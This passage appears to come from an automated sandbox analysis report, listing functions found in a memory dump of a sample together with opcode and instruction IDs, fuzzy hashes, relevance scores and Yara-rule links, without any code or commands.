                                                                                                            • Instruction Fuzzy Hash: 4131E132A006159FCB11DF58D8C1FA6B7E4FB28311F1401B9ED45EB281EB74DD458B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B01DB5, Relevance: .1, Instructions: 87COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                            • Instruction ID: 55ea0ebfacdbcd97d3cb2b1715497149f8e553b312da144e50858b4889c1e2ae
                                                                                                            • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                            • Instruction Fuzzy Hash: 3D218B32600618AFC725CF99CD80EAFBBBDEF85780F1144A5F90197261D630EE41DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00AD9100, Relevance: .1, Instructions: 87COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 06547ca9cb1836aad451277d2f0ebe2e46a196ce8362dc4c1dbf19445d36486d
                                                                                                            • Instruction ID: 85db2285ffa71732dd2041aa7be0f091824a47c7e75b2675160aa8da62a94170
                                                                                                            • Opcode Fuzzy Hash: 06547ca9cb1836aad451277d2f0ebe2e46a196ce8362dc4c1dbf19445d36486d
                                                                                                            • Instruction Fuzzy Hash: 4931E671A05246DFDB61DFA8C588BAEBBF1BB49310F28829AE40667351C734ED80CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00AF0050, Relevance: .1, Instructions: 81COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 982ec910af79cf8e57197847a124532e249672d63b52c49e9ddd996ec8a4fdc8
                                                                                                            • Instruction ID: 0cb07aa9448437d08417b9d384f6b55931aa75c0e147bb904bb5dbe9c4a5337a
                                                                                                            • Opcode Fuzzy Hash: 982ec910af79cf8e57197847a124532e249672d63b52c49e9ddd996ec8a4fdc8
                                                                                                            • Instruction Fuzzy Hash: B4317A31201A08CFD725CB68C845FAAB7E5FB88714F2445A9E59A87A91EF35AC01CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B56C0A, Relevance: .1, Instructions: 79COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e4ac6201c124ae16c0d14940c759cd5e4e3582256cb50e85069dbfc8abf70bc0
                                                                                                            • Instruction ID: 7b3810a508a015311f25db17221db6e79a7e01ee5bfb895fa0b80a292bb36f81
                                                                                                            • Opcode Fuzzy Hash: e4ac6201c124ae16c0d14940c759cd5e4e3582256cb50e85069dbfc8abf70bc0
                                                                                                            • Instruction Fuzzy Hash: 5C218B71A04644AFC715DBA8D980F6AB7F8FF48740F1400A9F948D7791DA34ED50CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B190AF, Relevance: .1, Instructions: 76COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                            • Instruction ID: 65cf69bde631c8b48b72b47ced82c861c0c077e1710e8d94d2a6d16a4b627a87
                                                                                                            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                            • Instruction Fuzzy Hash: 25218071A00245FFDB20DF59C884AAAF7F8EB54310F1488AAF959A7341D330EE94CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B03B7A, Relevance: .1, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 61817d538f2080f4e0322ec2675288ff1000efbda6c7e45d2514e7ca9594fb81
                                                                                                            • Instruction ID: 2169cc7da08f83265e28b0c6159823d34ef0cc2597229886af17501372b1d5c7
                                                                                                            • Opcode Fuzzy Hash: 61817d538f2080f4e0322ec2675288ff1000efbda6c7e45d2514e7ca9594fb81
                                                                                                            • Instruction Fuzzy Hash: 6F217F72600109AFDB14DB98CD81F6ABBBDFF44708F1500A8E508AB261D771AE41DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B56CF0, Relevance: .1, Instructions: 74COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1eab9d4a525c71cfdb6fbea3961853a47359330de29887ebede49d92f38beff2
                                                                                                            • Instruction ID: 81838704611924cce10c4b56615466b1a2e88c516b10472aa5d7b609a5e4fa1e
                                                                                                            • Opcode Fuzzy Hash: 1eab9d4a525c71cfdb6fbea3961853a47359330de29887ebede49d92f38beff2
                                                                                                            • Instruction Fuzzy Hash: 8B21D3726042459BD711DF68C944BABBBECEF81740F4409E6BD4087291E734C90DCAA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00BA070D, Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                            • Instruction ID: e354d648751e5c276c6122ecb9f2ad1bee978412e1f5cb6eb4cb3bf1739ee93d
                                                                                                            • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                            • Instruction Fuzzy Hash: B82126362082049FD715EF18C880B6ABBE5EFC5350F0485A9F9958B382D730ED09CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00AFAE73, Relevance: .1, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                            • Instruction ID: d4e39b4b65698f08e638d9148f48548b99cf1b3b7e86c105d2b490fe3cbdefe3
                                                                                                            • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                            • Instruction Fuzzy Hash: 0F2126726056888FD7159BA8C944B7537E8EF14340F1A00E0FE088B392D734DD40EA91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B57794, Relevance: .1, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 17f51b95d937fc9f37a2261737a983d5224195ce86c7ebda89b591d4a1eba39c
                                                                                                            • Instruction ID: 981e48e184e4480ffb58f5273e755ae0383a01b16d8f3e114a06835bb635ee0f
                                                                                                            • Opcode Fuzzy Hash: 17f51b95d937fc9f37a2261737a983d5224195ce86c7ebda89b591d4a1eba39c
                                                                                                            • Instruction Fuzzy Hash: 67219F72644604ABC725DFA9EC94EABB7E9EF4C340F1005A9FA0AC7750DA34ED04CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B0FD9B, Relevance: .1, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                            • Instruction ID: 91ab37a5e8daf0fe0a20d2a0d793bf9f370607a0f1efa01697cf57bf762a1267
                                                                                                            • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                            • Instruction Fuzzy Hash: 89217C72600A46DBC731CF49C680A76FBE5EB94B10F2481BEE94587A61D730AD00DB80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00AD9240, Relevance: .1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 00757aaa9d7cd0e84db0072b33eb85a51ffbcf9b3b7f69d5c369dc9747a6fea1
                                                                                                            • Instruction ID: e83669f0f50f17cd8f59f662e7267b10af4933ffabeb1abb5775aa48ac6018c9
                                                                                                            • Opcode Fuzzy Hash: 00757aaa9d7cd0e84db0072b33eb85a51ffbcf9b3b7f69d5c369dc9747a6fea1
                                                                                                            • Instruction Fuzzy Hash: 7A212831151601DFC726EFA8CA41FAAB7F9BF18704F1445ADB14A9B6B2CB34E941CB44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B0B390, Relevance: .1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6444a47a71a55461132500587f8a4684e1a2fd336247ae622b2c23149e06a935
                                                                                                            • Instruction ID: 501e99bf107127af10a66dae9ef4788325dd4353104d5324cb086703e06de7eb
                                                                                                            • Opcode Fuzzy Hash: 6444a47a71a55461132500587f8a4684e1a2fd336247ae622b2c23149e06a935
                                                                                                            • Instruction Fuzzy Hash: 131144333151209BCB289A549E81E6B76D7EBC5370B3841BDEA16873C0DE31AC02D799
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B64257, Relevance: .1, Instructions: 60COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 13d43deb5ff8e18f05c8666ade8861e086d366549183c716bb6585306e7ae9c4
                                                                                                            • Instruction ID: d6c0566580702de028bf467d0c3ae6849cc3d7d5bfb4ad9b7e4e3f8d03076bc6
                                                                                                            • Opcode Fuzzy Hash: 13d43deb5ff8e18f05c8666ade8861e086d366549183c716bb6585306e7ae9c4
                                                                                                            • Instruction Fuzzy Hash: DF213870512A01CFC725EF64D951A15BBF1FB89314B3082AEE1198B2A1EF39D881CB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B546A7, Relevance: .1, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                            • Instruction ID: ead604ccffda40adf4f90b8814bbcfac4eb2c9b04919ba02849db44565f8b10a
                                                                                                            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                            • Instruction Fuzzy Hash: E711C272504208BBCB059F9CD9819BEBBB9EF99304F1080AAF944C7351DA319D55D7A4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B02397, Relevance: .1, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 98fa5e9382346c9e788524a9b56c51b2742dbef96cc1698c7263f63b9169ec68
                                                                                                            • Instruction ID: 0b998b63e38ffda85fce4d920d1509174b8784bda2e6374a90f749f560784914
                                                                                                            • Opcode Fuzzy Hash: 98fa5e9382346c9e788524a9b56c51b2742dbef96cc1698c7263f63b9169ec68
                                                                                                            • Instruction Fuzzy Hash: EA112B316047006FD731A729AC85F25BACCEB50750F2440B6F606A73D2CE74D8459758
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00ADC962, Relevance: .1, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 645ff6ce92396fa53b37f96be0a4b4c4378ca51f1d6cc91fcf61f2de4d13061a
                                                                                                            • Instruction ID: 67fd5e79267a0ba5b474c79f0cf76aca900e8c595c23249446865ad8beb2dea9
                                                                                                            • Opcode Fuzzy Hash: 645ff6ce92396fa53b37f96be0a4b4c4378ca51f1d6cc91fcf61f2de4d13061a
                                                                                                            • Instruction Fuzzy Hash: 7511E132348646ABC710AF28DC86E2BB7F5FB88710B1005B9F941936A2DF20ED14DBD1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B137F5, Relevance: .1, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a4b730972cb4d6a3defbb3f6a2222baee83760ee18fe310bc5226346daf6a8a5
                                                                                                            • Instruction ID: d32a2058a4a4edba2c4418e0bb64a9317c8f8e14c157643c144556a6a0b5898f
                                                                                                            • Opcode Fuzzy Hash: a4b730972cb4d6a3defbb3f6a2222baee83760ee18fe310bc5226346daf6a8a5
                                                                                                            • Instruction Fuzzy Hash: 020126B29016109BC3378B1A9A40EAABBE6DF85F6075540EDF9098B211EB30CE81C7C0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B0002D, Relevance: .1, Instructions: 55COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                            • Instruction ID: 1211a8c6bbf3605ba21acd8f0e19cf1275381472af877bdf8eaf8f9bb88b1d5f
                                                                                                            • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                            • Instruction Fuzzy Hash: D1112232616685CFD722AB68CA84B393BD4EF40754F1900E0EE048B7D2E328CD51E660
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00AE766D, Relevance: .1, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                            • Instruction ID: 0cbe19210dc6d76f4e688189a91114038898bbb71d023198a912ffc4d42784c5
                                                                                                            • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                            • Instruction Fuzzy Hash: 0C01A73270455AABC720EE5FDD41E6F77ADEB84764F280574BA08CB250DA30DD01C7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00AD9080, Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2eb999ddd9088548e1f23dae365cbaf5cfa7d69ef0f30e5926d40bb01ac5299b
                                                                                                            • Instruction ID: 5df57651cfe542558558e2fa16d8211c4659455c4d06f7a63e039e69b43da958
                                                                                                            • Opcode Fuzzy Hash: 2eb999ddd9088548e1f23dae365cbaf5cfa7d69ef0f30e5926d40bb01ac5299b
                                                                                                            • Instruction Fuzzy Hash: D201AF726016449FC3259F18E840B62BBF9EB99720F25407BE6068B7A1C774EC81CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B6C450, Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                            • Instruction ID: 26c5b13ee6593d808452a4f8c69a9cb1d90e7d10478d0d11357ce5462c309725
                                                                                                            • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                            • Instruction Fuzzy Hash: EB01F572140609BFD721AF65CC91EB2FBAEFF54790F404125F24452660CB36ECA0CAA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00BA4015, Relevance: .0, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2c417db820ae7c1177096ca3e741061e37d5d3094e94bea8bd464849db365130
                                                                                                            • Instruction ID: eb1187c7e8c6121cbc4efa56c67f932a6170a5a3b78d98a935f5e2dd2ed68810
                                                                                                            • Opcode Fuzzy Hash: 2c417db820ae7c1177096ca3e741061e37d5d3094e94bea8bd464849db365130
                                                                                                            • Instruction Fuzzy Hash: 440184722015497FC221ABB9CE81E67B7ACEB85750B00026AB60883A52CB24EC11C6E4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B914FB, Relevance: .0, Instructions: 48COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fd03da1cdb3918b46914e455eed47fb0280c4afdabb15301f36b50547e916312
                                                                                                            • Instruction ID: c5b7be57b5fcfd9598cde6da7f3033a4e97e7ef597dc14a0846b62af3db81b80
                                                                                                            • Opcode Fuzzy Hash: fd03da1cdb3918b46914e455eed47fb0280c4afdabb15301f36b50547e916312
                                                                                                            • Instruction Fuzzy Hash: 6B019271A00248AFCB04DFA8D842EAEB7F8EF44710F4040A6F914EB281DA74DA40CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B9138A, Relevance: .0, Instructions: 48COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 18be6abe22b1ba21310ac0ba033819c49f8005fbf555a0728f7116e010950594
                                                                                                            • Instruction ID: 5539402155022ac27ebbf8b0c52caed5e432fabce6e4eb49c2a2ff5648a21147
                                                                                                            • Opcode Fuzzy Hash: 18be6abe22b1ba21310ac0ba033819c49f8005fbf555a0728f7116e010950594
                                                                                                            • Instruction Fuzzy Hash: 0E015271A04258AFCB14DFA9D842EAEBBF8EF44710F4040A6F904EB281DA749A41CB95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00AD58EC, Relevance: .0, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c167c337841389343ee994cfb0baceaf553511a5ec1b5db69606edc0b35e6f19
                                                                                                            • Instruction ID: 58b0b5e67685683838b45a38dc49ea2e9111bbf4825d5b18e0a39ae92e7b79f6
                                                                                                            • Opcode Fuzzy Hash: c167c337841389343ee994cfb0baceaf553511a5ec1b5db69606edc0b35e6f19
                                                                                                            • Instruction Fuzzy Hash: D4018F31F00908DBC724EB39DC21AAE77ECEB84360F9400AAA90697351EE30ED068694
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00AEB02A, Relevance: .0, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                            • Instruction ID: ecfeeca2751259f0eaa259dbe1878eca8fb7b4384f831e63244d211aaf3cc01f
                                                                                                            • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                            • Instruction Fuzzy Hash: C7017832215AC49FD322DB5EC988F6777E8EB45B50F2900E1F919CBAA1D738EC40C621
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00BA1074, Relevance: .0, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9fa608f0e1e3bd56f133118f9c92c9c048614643d51cffa2f39f112c13781d3c
                                                                                                            • Instruction ID: c5885076aa7a56634fd354cd29a9d8cb8218dc55ab8f38bda34d376beeed2367
                                                                                                            • Opcode Fuzzy Hash: 9fa608f0e1e3bd56f133118f9c92c9c048614643d51cffa2f39f112c13781d3c
                                                                                                            • Instruction Fuzzy Hash: 590147725087419FC760EF6CC941F1BB7E5EB84310F04CAA9F885832A1EE31D880CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B8FEC0, Relevance: .0, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 75ee274307555303a945c06ad35ee3e7f52b8c4a8dfcc9232da5f0c5a76c4b51
                                                                                                            • Instruction ID: d65cba528882f5be350f8532c9ab53f76554b633f16df2cc2733c6858cbce9d8
                                                                                                            • Opcode Fuzzy Hash: 75ee274307555303a945c06ad35ee3e7f52b8c4a8dfcc9232da5f0c5a76c4b51
                                                                                                            • Instruction Fuzzy Hash: 10018871A01249ABC714DFA9D846FBEB7F8EF44710F404066F9049B291DA749941C795
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B8FE3F, Relevance: .0, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 283409e56dbcc11c519984361a512572d4e719c6a5bcba09cbc965f2eab8cb6d
                                                                                                            • Instruction ID: 29d69e26057e4a4166dcf1e7031b363fa496035e6186b408f3b6aeaa7b897311
                                                                                                            • Opcode Fuzzy Hash: 283409e56dbcc11c519984361a512572d4e719c6a5bcba09cbc965f2eab8cb6d
                                                                                                            • Instruction Fuzzy Hash: 1F018471A0024DABCB14EFA9D846FBEB7F8EF44710F4040A6F904AB291DA749941C795
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00BA8ED6, Relevance: .0, Instructions: 44COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 469a7ef6d7b600a9a3b64e75ab6552befcf217fff25a3e2d857a2473752df003
                                                                                                            • Instruction ID: bebc8b8ee57bad043b613082e14733268530c42164c198011a87e247360b1122
                                                                                                            • Opcode Fuzzy Hash: 469a7ef6d7b600a9a3b64e75ab6552befcf217fff25a3e2d857a2473752df003
                                                                                                            • Instruction Fuzzy Hash: FE111E70A042499FDB04DFA8D541BAEF7F4FF08300F5442BAE918EB782EA349940CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00BA8A62, Relevance: .0, Instructions: 44COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
